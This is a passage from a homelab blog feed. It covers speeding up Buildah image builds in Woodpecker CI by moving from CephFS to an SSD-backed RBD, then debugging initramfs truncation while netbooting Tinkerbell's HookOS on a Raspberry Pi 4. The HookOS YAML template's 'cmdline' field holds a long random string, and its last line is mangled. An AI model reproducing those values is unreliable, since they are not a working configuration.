</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>Here I need to do a few more things than in the build step. The first is the login,
which is done via <code>buildah login</code>. Something that slightly annoys me here is
that Buildah only seems to support either interactive input of the
password or providing it via a CLI flag, but not e.g. via an environment
variable.</p>
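<p>One alternative that should work, assuming <code>buildah login</code> supports the same
<code>--password-stdin</code> flag as <code>podman login</code> (which I believe it does), is
to pipe the secret in instead of putting it on the command line:</p>
<pre tabindex="0"><code># Untested alternative: keep the password off the command line
echo &#34;${PLUGIN_PASSWORD}&#34; | buildah login -u &#34;${PLUGIN_USERNAME}&#34; --password-stdin &#34;${PLUGIN_REPO}&#34;
</code></pre>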
<p>When the login succeeds, the code iterates over all platforms and adds the
<code>$PLATFORM:0.0</code> image to the new manifest. Once that&rsquo;s all done, the resulting
manifest containing all the required platforms&rsquo; images is pushed to the repository
given in the <code>repo</code> option for the plugin.</p>
<p>I prefer having a plugin like this, because Woodpecker&rsquo;s &ldquo;command form&rdquo; steps
cannot re-use YAML anchors like I was able to do here, so there would have
been a lot more repetition in the pipeline setups.</p>
<h2 id="performance">Performance</h2>
<p>After I got the plugin working, I started migrating my existing image builds over
to the new plugin. I started out with my <a href="https://www.fluentd.org/">Fluentd</a>
image, where I take the official Fluentd image and install a few additional
plugins into it before deploying it into my Kubernetes cluster. The Containerfile
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> fluentd_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> fluent/fluentd:${fluentd_ver}</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">USER</span><span style="color:#e6db74"> root</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /usr/bin/dpkg-split /usr/sbin/dpkg-split<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /usr/bin/dpkg-deb /usr/sbin/dpkg-deb<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /bin/rm /usr/sbin/rm<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /bin/tar /usr/sbin/tar<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> buildDeps<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sudo make gcc g++ libc-dev&#34;</span> apt-get update <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apt-get install -y --no-install-recommends $buildDeps curl <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> gem install <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>       fluent-plugin-grafana-loki <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>       fluent-plugin-record-modifier <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-multi-format-parser <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-rewrite-tag-filter <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-route <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-http-healthcheck <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-kv-parser <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-parser-logfmt <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> gem sources --clear-all <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> SUDO_FORCE_REMOVE<span style="color:#f92672">=</span>yes <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>      apt-get purge -y --auto-remove <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                    -o APT::AutoRemove::RecommendsImportant<span style="color:#f92672">=</span>false <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                    $buildDeps <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> rm -rf /var/lib/apt/lists/* <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> rm -rf /tmp/* /var/tmp/* /usr/lib/ruby/gems/*/cache/*.gem<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">USER</span><span style="color:#e6db74"> fluent</span><span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>And that&rsquo;s where I discovered that performance still wasn&rsquo;t exactly up to snuff:
<figure>
    <img loading="lazy" src="shared-disk-build.png"
         alt="A screenshot of Woodpecker&#39;s CI run UI. On the left, it shows the Fluentd build and its steps. The clone steps finishes in 15s, but the two build steps for amd64 and arm64 take 22:57 and 23:32 respectively. The final &#39;push image&#39; steps takes 04:49 minutes and failed. To the right are some logs of the adm64 image build, showing the executed buildah command and the initial pull of the fluentd/fluentd:v1.19.0-debian-1.0 image. To the very right of the output, a relative timestamp shows that the first step after the image pull, &#39;USER root&#39;, happens 1087s after the start of the step&#39;s run."/> <figcaption>
            <p>The fluentd image build takes around 23 minutes, with the lion&rsquo;s share of 1087s/18 minutes taken by the pull of the fluentd image.</p>
        </figcaption>
</figure>

So here is a problem: The Fluentd build takes over 23 minutes. That&rsquo;s a lot, and
from the logs it looks like the initial image pull of the official Fluentd image
takes 18 minutes on its own. Though not shown here, it&rsquo;s a similar situation
on the arm64 build. I checked my connection, and the image was pulled from my local
Harbor pull-through cache, so it was not just a case of Docker Hub being slow.</p>
<p>The problem here again seems to be CephFS and/or the nature of container images
on disk. For a large part of the build, the Ceph cluster was adding 10k objects per
15s interval:
<figure>
    <img loading="lazy" src="cephfs-buildah-run.png"
         alt="A screenshot of a Grafana time series plot. It shows the object count changes per Ceph pool. Of interest here is the CephFS bulk pool. Starting at about 10:32, it produces 10k new objects per 15s, and does so almost continuously until 10:54."/> <figcaption>
            <p>Objects added in a 15s interval to the pools of my Ceph cluster. Orange/top line is my CephFS storage pool.</p>
        </figcaption>
</figure>

In total, this single two-image build added about 180k objects to the cluster:
<figure>
    <img loading="lazy" src="objects-in-cluster.png"
         alt="Another screenshot of a Grafana time series plot. This time it shows the number of objects in the entire cluster. It starts out at about 2.03 million objects. At around 10:32, it starts rising at a pretty consistent rate, until it hits its peak of about 2.20 million objects at around 10:54. Afterwards, it&#39;s stable for a little while at around 2.19 million, before it goes down steadily again to the previous 2.03 million in the span of just 10 minutes."/> <figcaption>
            <p>The CI run produced about 180k new objects in the Ceph storage cluster.</p>
        </figcaption>
</figure>
</p>
<p>After seeing all of this, I decided that the current setup might not be ideal
when it comes to storage. One thought I had was that both builds using the same
<code>--root</code> parameter on the shared volume might be part of the problem, perhaps
because Buildah does some locking of the storage area.
So I switched the different platform builds to different directories on the
shared volume. That did help somewhat, reducing the duration to about 15
minutes:
<figure>
    <img loading="lazy" src="separate-dirs-build.png"
         alt="Another screenshot of the Woodpecker UI, showing the same Fluentd build as before. This time, the amd64 and arm64 image build steps only took 15:06 and 14:56 respectively. The push image step still failed. The relative timestamp on the right now shows that the &#39;USER root&#39; step of the Dockerfile started after 659 seconds this time."/> <figcaption>
            <p>Still with a shared volume, but not with a shared directory on that volume, the builds take less time.</p>
        </figcaption>
</figure>

The builds go from about 24 minutes to only 15 minutes. The initial pull of the
Fluentd image goes down to about 11 minutes, from the previous 18 minutes.</p>
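<p>In pipeline terms, the change was nothing more than pointing each platform&rsquo;s build
step at its own storage root. Roughly like this, with the paths, flags and the image
name being purely illustrative rather than my actual pipeline config:</p>
<pre tabindex="0"><code># amd64 build step (sketch)
buildah --root /woodpecker/buildah-amd64 --storage-driver vfs bud --arch amd64 -t &#34;$IMAGE:amd64&#34; .

# arm64 build step (sketch)
buildah --root /woodpecker/buildah-arm64 --storage-driver vfs bud --arch arm64 -t &#34;$IMAGE:arm64&#34; .
</code></pre>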
<p>This still seemed pretty long, so I started to consider creating a new
CephFS with the data pool on SSDs, to hopefully improve the performance. But then
I had a thought: How about removing the parallelism entirely?
If I did not run the steps in parallel, I could use a Ceph RBD instead,
which would likely already be faster. Unlike CephFS, an RBD volume can only be
mounted read-write on a single node at a time, which is why it was not an option
while the steps ran in parallel on potentially different nodes. I also already
have a StorageClass for SSD-backed RBDs in my cluster, so no additional config
would be necessary. And finally, with a Ceph RBD instead of CephFS, I would be
able to use the faster OverlayFS storage driver for Buildah.</p>
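<p>On the Buildah side, the storage driver is just a command line switch. As a sketch,
with the image name again being illustrative:</p>
<pre tabindex="0"><code># On the CephFS volume I was limited to the slow VFS driver:
buildah --storage-driver vfs bud -t &#34;$IMAGE&#34; .

# On an RBD-backed volume with a regular filesystem, overlay can be used instead:
buildah --storage-driver overlay bud -t &#34;$IMAGE&#34; .
</code></pre>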
<p>So I did all of that, switched the StorageClass for Woodpecker&rsquo;s pipeline volumes
to my SSD RBD class, and then disabled parallelism for the steps. The results
were rather impressive:
<figure>
    <img loading="lazy" src="finally-fast.png"
         alt="Another screenshot of the Woodpecker UI, this time showing the image build steps only taking 01:42 minutes and 01:53 minutes. The push image step is successful now as well, taking 02:07 minutes. To the right, the logs of the image pull for the Fluentd image are shown again. The pull now took only 18s."/> <figcaption>
            <p>Both builds done sequentially on an SSD-backed Ceph RBD are faster than the same builds done in parallel, but on a CephFS volume with the VFS storage driver.</p>
        </figcaption>
</figure>
</p>
<p>The entire pipeline now runs through in about six minutes, less time than the previous
setup needed just for pulling down the Fluentd image.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>Even with all the weird errors I had to fix and the wrong turns I took, this
was fun, and the fact that I ended up without any parallelism was surprising.
I really enjoyed working on this one.</p>
<p>There are still a few improvements to be made, and some things to dig into. One
burning question I currently have is why the parallelized version, using the
VFS storage driver running on a CephFS shared volume, was so much slower. Was it
mostly the slower VFS storage driver? Or was it CephFS? And if it was CephFS,
what was actually the bottleneck? I wasn&rsquo;t able to find one, not in
IO utilization, network, or CPU on any of the nodes involved. I checked
both the nodes running the Buildah Pods and the Ceph nodes, and neither seemed to
show an overload of any resource. So I&rsquo;m a bit stumped.</p>
<p>Then there&rsquo;s also the fact that my Woodpecker steps still need to run in privileged
mode. I don&rsquo;t like that, but I wasn&rsquo;t able to figure out exactly what to do to
remove that requirement. From everything I&rsquo;ve read, this should be possible with
Buildah, but might need some additional configuration on the Kubernetes nodes.
I will have to check this in the future.</p>
<p>But for now, finally back to working on setting up a Bookwyrm instance.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part V: Booting HookOS on a Pi 4</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-5-hookos-direct-boot/</link>
      <pubDate>Tue, 15 Jul 2025 22:50:11 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-5-hookos-direct-boot/</guid>
      <description>I&amp;#39;m trying to boot Tinkerbell&amp;#39;s HookOS on a Pi 4 without iPXE/EFI</description>
      <content:encoded><![CDATA[<p>In this post, I will describe my failed attempts at booting Tinkerbell&rsquo;s in-memory
HookOS directly on a Pi 4, without iPXE or UEFI.</p>
<p>This is part 5 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p>In my <a href="https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/">previous post</a>, I
described how I provisioned a Pi 4 using Tinkerbell&rsquo;s standard way via UEFI
and iPXE. This was a complicated and convoluted process, requiring heavy use of
Dnsmasq on the side and bouncing between requests to said Dnsmasq and Tinkerbell
itself. In the end, I was only able to do it after completely switching off
Tinkerbell&rsquo;s DHCP functionality. I wasn&rsquo;t particularly fond of that option,
because I quite liked how it worked for provisioning the VM in my first
experiments. I didn&rsquo;t want to completely switch off DHCP in Tinkerbell just
because of the Pi 4.</p>
<p>Another pretty big issue was the Pi 5. From everything I could see, the
<a href="https://github.com/worproject/rpi5-uefi">Pi 5 UEFI project</a> is dead right now.
So working with iPXE/UEFI was not possible for the Pi 5 anyway, and I&rsquo;m already
running three of those, with a fourth planned.</p>
<h2 id="the-potential-solution-with-direct-boot">The potential solution with direct boot</h2>
<p>So I took a look at what Tinkerbell&rsquo;s provisioning actually does. Its core part
is the Tink workflow engine, running on <a href="https://github.com/tinkerbell/hook">HookOS</a>.
This is Tinkerbell&rsquo;s in-memory provisioning OS. Its only task is to provide
a Linux environment with Docker to run the provisioning tasks. And it&rsquo;s not a
special Linux really, just one which runs entirely from the initramfs.</p>
<p>So the only thing I really needed was the ability to boot into the HookOS kernel,
which again, isn&rsquo;t actually anything special, and then run HookOS&rsquo; initramfs.
And that&rsquo;s already possible with the Pi&rsquo;s netboot mechanism. You can provide
the name of a kernel and an initramfs, and the Pi&rsquo;s firmware will download those
from the TFTP server it receives during DHCP discovery. This is at least a simpler
approach than needing to work with UEFI and iPXE. And it has the advantage that
it should also work with the Pi 5.</p>
<p>There are a couple of additional issues with this solution, mainly that I would
still like a tighter connection with Tinkerbell&rsquo;s DHCP side. But for now, I&rsquo;m
mostly interested in seeing what my overall options with Tinkerbell and the
Raspberry Pi&rsquo;s netboot process are. Then I will think a bit more about potential
changes I could propose to the Tinkerbell project.</p>
<h2 id="trying-the-official-hookos-release">Trying the official HookOS release</h2>
<p>The newest HookOS release is <a href="https://github.com/tinkerbell/hook/releases/tag/v0.10.0">v0.10.0</a>,
so I started with that one. Besides the standard x86_64 and aarch64 kernels,
HookOS also provides a version with <a href="https://www.armbian.com/">Armbian&rsquo;s</a>
Raspberry Pi kernel and an initramfs build for aarch64. That combination is what I used.</p>
<p>In preparation, I downloaded the <code>hook_armbian-bcm2711-current.tar.gz</code> file from
HookOS, which contains the kernel and initramfs. But that leaves out some Pi-specific
files which are also needed when netbooting a Pi. I decided to get those
files from Armbian as well, namely from <a href="https://www.armbian.com/rpi4b/">this page</a>.
I chose the &ldquo;Minimal/IoT&rdquo; image. Then I mounted the image locally to get at the
content of the boot partition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>losetup -f --show -P Armbian_25.5.1_Rpi4b_noble_current_6.12.28_minimal.img
</span></span><span style="display:flex;"><span>mount /dev/loop0p1 /mnt/temp/
</span></span></code></pre></div><p>This then allowed me to copy a couple of files, namely:</p>
<ul>
<li><code>bcm2711-rpi-4-b.dtb</code> (that was the only dtb I copied, because I&rsquo;m working only with a Pi 4b for now)</li>
<li><code>cmdline.txt</code></li>
<li><code>config.txt</code></li>
<li><code>fixup4*</code></li>
<li><code>start4*</code></li>
</ul>
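<p>Copying those files into place then looked roughly like this, with the TFTP root
path being purely illustrative:</p>
<pre tabindex="0"><code>cp /mnt/temp/bcm2711-rpi-4-b.dtb /mnt/temp/cmdline.txt /mnt/temp/config.txt /srv/tftp/
cp /mnt/temp/fixup4* /mnt/temp/start4* /srv/tftp/
</code></pre>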
<p>The next challenge was the kernel command line. Tinkerbell provides a few
important values through the kernel command line when booting via its iPXE
script, so I booted the Pi with iPXE again and wanted to copy the kernel command
line. But I did not have direct access to the Pi from my desktop, because HookOS
doesn&rsquo;t run SSH by default. I was using it through a separate keyboard and display.</p>
<p>At that point I had to sit back for a few minutes and consider my life choices
a bit. Because with all the services I&rsquo;ve got running in my Homelab, all the
Kubernetes clusters, the Ceph storage clusters, the myriad of apps - I somehow
did not have a no-frills, zero config way to share a copy+paste of the kernel
command line from one host to another. I was a bit disappointed in myself.</p>
<p>But then I had an excellent idea, if I may say so myself: <a href="https://en.wikipedia.org/wiki/Netcat">Netcat</a>!
It can do simple TCP transfers. So I launched this command on my desktop:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nc -l -p <span style="color:#ae81ff">1234</span> &gt; out.txt
</span></span></code></pre></div><p>And then, on the Pi booted into HookOS, I ran this:</p>
<pre tabindex="0"><code>dmesg &gt; out.txt
nc -w 3 198.51.100.25 1234 &lt; out.txt
</code></pre><p>And just like that, I had the data available on my desktop. I&rsquo;m honestly a bit
enamored with myself for coming up with this rather simple and expedient solution. &#x1f601;</p>
<p>The important bits of the command line looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tink_worker_image<span style="color:#f92672">=</span>ghcr.io/tinkerbell/tink-agent:v0.18.3-b817f7f2 facility<span style="color:#f92672">=</span> syslog_host<span style="color:#f92672">=</span>203.0.113.200 grpc_authority<span style="color:#f92672">=</span>203.0.113.200:42113 tinkerbell_tls<span style="color:#f92672">=</span>false tinkerbell_insecure_tls<span style="color:#f92672">=</span>false worker_id<span style="color:#f92672">=</span>e4:5f:01:bc:f4:ce hw_addr<span style="color:#f92672">=</span>e4:5f:01:bc:f4:ce modules<span style="color:#f92672">=</span>loop,squashfs,sd-mod,usb-storage initrd<span style="color:#f92672">=</span>initramfs-aarch64
</span></span></code></pre></div><p>I added those Tinkerbell-specific options to the <code>cmdline.txt</code> file in the
TFTP directory and also adapted the <code>config.txt</code>, setting the HookOS kernel and
initramfs:</p>
<pre tabindex="0"><code>[all]
kernel=vmlinuz-armbian-bcm2711-current
initramfs initramfs-armbian-bcm2711-current followkernel
</code></pre><p>With all of that done, I booted the Pi up. While the kernel booted and
containerd in the initramfs started, there was no shell, and in the
Tinkerbell logs I did not see any attempt by the Pi to contact Tinkerbell. I did
not even see an attempt to get an IP via DHCP after the netboot part was done.
The only error message I could see on the small screen I was using was this one:</p>
<pre tabindex="0"><code>Failed to read service spec error &#34;open /containers/services/getty/config.json: No such file or directory&#34;
</code></pre><p>Considering that getty is what provides the shell, at least I now knew
why I wasn&rsquo;t getting a prompt. So I unpacked the initramfs with this command
to make sure the file was actually there:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gunzip -c initramfs-armbian-bcm2711-current | cpio -i
</span></span></code></pre></div><p>And yes, the file does actually exist in the initramfs. So what&rsquo;s going on here?
My main problem was that I wasn&rsquo;t getting a shell, so I didn&rsquo;t have any good
way to get at the rest of the boot messages, to see whether there was another
error.
So I went for a bad way instead: filming the small screen I had connected to the
Pi. As you might imagine, this wasn&rsquo;t a great solution. For one, I had to transfer
the video to my desktop via Nextcloud, because I couldn&rsquo;t properly read
anything on my phone&rsquo;s screen. Then there&rsquo;s the problem that a video is taken
at a fixed framerate, and sometimes the logs scrolled by too quickly to catch
everything.</p>
<p>This is what all too much of the video looked like:</p>
<figure>
    <img loading="lazy" src="unreadable-output.jpg"
         alt="A picture of a small screen showing Linux kernel startup logs. The output is all jumbled up, with previous lines still partially visible, faded under the current lines."/> <figcaption>
            <p>Not really readable output from trying to take a video of the boot process.</p>
        </figcaption>
</figure>

<p>But I still got a bit more out of it, most importantly this message:</p>
<pre tabindex="0"><code>rootfs image is not initramfs (read error): looks like an initrd
</code></pre><p>But that was less than helpful. At least on my desktop, the initramfs looked
perfectly fine, with no issues unpacking it at all.</p>
<p>But while fiddling with kernel command line options and the <code>config.txt</code> content,
to no avail at all, I suddenly saw the <code>console=</code> option and realized that I
could make my life at least a bit easier. I got out my trusty USB-to-Serial
adapter and followed <a href="https://www.jeffgeerling.com/blog/2021/attaching-raspberry-pis-serial-console-uart-debugging">this tutorial</a>
to get it attached to the Pi. After adding <code>console=serial0,115200</code> to the
kernel command line, I was then able to connect to the Pi via serial console.
I used minicom on my desktop, where the serial adapter showed up as <code>/dev/ttyUSB0</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>minicom -b <span style="color:#ae81ff">115200</span> -D /dev/ttyUSB0
</span></span></code></pre></div><p>And just like that, I had all of the boot time messages on my desktop and no
longer needed to film the boot process.</p>
<p>But I still wasn&rsquo;t really getting anywhere; the errors stayed the same. I also
tried a few other kernels, thinking that there might be something wrong with the
HookOS kernel. For example, I tried the Ubuntu kernel I use for my production
Pis, but to no avail. The error stayed the same.</p>
<p>So I decided I would dig into HookOS and <a href="https://github.com/linuxkit/linuxkit">LinuxKit</a>,
which HookOS is based on.</p>
<h2 id="trying-a-newer-kernel">Trying a newer kernel</h2>
<p>Still having no idea what was going on, I decided to try a newer kernel. The
last HookOS release was from November 2024, so I figured perhaps something
had changed since then.</p>
<p>And at this point, I have to send a really big kudos to the Tinkerbell team
for HookOS&rsquo; builds. I was perfectly prepared to spend some time getting my VM set
up properly to actually build HookOS successfully. But I didn&rsquo;t need to. Quite
the contrary: most dependencies were automatically installed, and everything
went very smoothly. I was rather impressed. &#x1f44d;</p>
<p>So for the experiment, I cloned the <a href="https://github.com/tinkerbell/hook">HookOS repo</a>
locally and switched into it. Then I had to manually install a few tools which
were missing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>apt install docker.io docker-buildx
</span></span></code></pre></div><p>Then I just executed the build script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./build.sh kernel armbian-bcm2711-current
</span></span></code></pre></div><p>This installed a few additional dependencies via apt, and then built an OCI
image with the newest Armbian Pi kernel. Then, to build the full HookOS, including
device trees and initramfs, I ran this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./build.sh build armbian-bcm2711-current
</span></span></code></pre></div><p>At the time I executed the commands, the Armbian kernel I got was <code>6.12.35-S8292-Dbdda-P0000-Ce6dbH2313-HK01ba-Vc222-Ba566-R448a</code>.
The build results in an <code>out/</code> directory in the local dir, which contains the
device tree, Raspberry Pi overlays and kernel+initramfs. I copied it all into
my TFTP directory and tried to boot the Pi again. But yet again, I got a kernel
boot and containerd startup, but no prompt.</p>
<p>In a last desperate attempt, I tried with a <code>5.15</code> kernel from Armbian&rsquo;s
<code>kernel-bcm2711-legacy</code>, but that also ran into exactly the same issue.</p>
<h2 id="mangling-hookos">Mangling HookOS</h2>
<p>After a while of fruitlessly playing around, I started reading more and more
Google hits talking about truncation of the initramfs by some implementations. So
I decided to try to reduce the size by re-compressing the initramfs with zstd.
That only got the initramfs down to 122 MB, but it did something
more important: it confirmed the truncation theory via this kernel message:</p>
<pre tabindex="0"><code>rootfs image is not initramfs (ZSTD-compressed data is truncated); looks like an initrd
[...]
RAMDISK: zstd image found at block 0
RAMDISK: incomplete write (-28 != 131072)
</code></pre><p>This error indicates that the initramfs compression was correctly recognized,
but the data was truncated. I finally had proper proof that truncation was the
problem.</p>
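<p>The re-compression itself was nothing fancy, roughly just unpacking the gzip archive
and packing it up again with zstd, with the output file name here being illustrative:</p>
<pre tabindex="0"><code>gunzip -c initramfs-armbian-bcm2711-current &gt; initramfs.cpio
zstd -19 initramfs.cpio -o initramfs-armbian-bcm2711-current-zstd
</code></pre>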
<p>For further investigation, I adapted HookOS a bit to ensure that Getty gets
launched early in the boot process, in the hope that I would get a prompt and
could look around.</p>
<p>LinuxKit, the dockerized Linux distro HookOS is built upon, has a template file
which describes what to put into the initramfs. The one for HookOS looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kernel</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_KERNEL_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cmdline</span>: <span style="color:#e6db74">&#34;464vn90e7rbj08xbwdjejmdf4it17c5zfzjyfhthbh19eij201hjgit021bmpdb9ctrc87x2ymc8e7icu4ffi15x1hah9iyaiz38ckyap8hwx2vt5rm44ixv4hau8iw718q5yd019um5dt2xpqqa2rjtdypzr5v1gun8un110hhwp8cex7pqrh2ivh0ynpm4zkkwc8wcn367zyethzy7q8hzudyeyzx3cgmxqbkh825gcak7kxzjbgjajwizryv7ec1xm2h0hh7pz29qmvtgfjj1vphpgq1zcbiiehv52wrjy9yq473d9t1rvryy6929nk435hfx55du3ih05kn5tju3vijreru1p6knc988d4gfdz28eragvryq5x8aibe5trxd0t6t7jwxkde34v6pj1khmp50k6qqj3nzgcfzabtgqkmeqhdedbvwf3byfdma4nkv3rcxugaj2d0ru30pa2fqadjqrtjnv8bu52xzxv7irbhyvygygxu1nt5z4fh9w1vwbdcmagep26d298zknykf2e88kumt59ab7nq79d8amnhhvbexgh48e8qc61vq2e9qkihzt1twk1ijfgw70nwizai15iqyted2dt9gfmf2gg7amzufre79hwqkddc1cd935ywacnkrnak6r7xzcz7zbmq3kt04u2hg1iuupid8rt4nyrju51e6uejb2ruu36g9aibmz3hnmvazptu8x5tyxk820g2cdpxjdij766bt2n3djur7v623a2v44juyfgz80ekgfb9hkibpxh3zgknw8a34t4jifhf116x15cei9hwch0fye3xyq0acuym8uhitu5evc4rag3ui0fny3qg4kju7zkfyy8hwh537urd5uixkzwu5bdvafz4jmv7imypj543xg5em8jk8cgk7c4504xdd5e4e71ihaumt6u5u2t1w7um92fepzae8p0vq93wdrd1756npu1pziiur1payc7kmdwyxg3hj5n4phxbc29x0tcddamjrwt260b0w&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># this init container sha has support for volumes</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/init:872d2e1be745f1acb948762562cf31c367303a3b</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_RUNC_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_CONTAINERD_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/ca-certificates:v1.0.0</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/firmware:24402a25359c7bc290f7fc3cd23b6b5f0feb32a5</span> <span style="color:#75715e"># &#34;Some&#34; firmware from Linuxkit pkg; see https://github.com/linuxkit/linuxkit/blob/master/pkg/firmware/Dockerfile</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_EMBEDDED_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">onboot</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">dhcpcd-once</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/dhcpcd:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/etc/ip/dhcp.sh&#34;</span>, <span style="color:#e6db74">&#34;true&#34;</span> <span style="color:#f92672">] # 2nd paramter is one-shot true/false</span>: <span style="color:#66d9ef">true</span> <span style="color:#ae81ff">for onboot, false for services</span>
